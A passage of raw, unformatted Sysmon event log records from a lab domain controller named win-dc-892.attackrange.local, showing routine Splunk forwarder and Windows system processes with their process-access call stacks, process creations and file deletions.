Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.672{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.578{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA9CDD0A2404C2435177362B38B08BC3,SHA256=1E9408C2FD6727A88AA50CDBD2CB3E73855A6074CD6E1C6533ECAFB1D28ADFB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.156{266CAFBE-669F-6064-7F01-00000000AE01}51446224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.593{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FB6FC08696B2BFEC602FCEB50B23C8E,SHA256=9D32B0B6C8C4FC3160B1762A144152A1554063C0E757AB8A1F616EF84225A8EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.890{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.890{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.890{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x800000000000000011387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.609{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF533E822E36B61B3588F79443C3BD71,SHA256=45946595DA09B0DA0A469407E08F31F18BA348AEE41A7870C75AFB7C3FA9F399,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66A1-6064-8101-00000000AE01}1260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 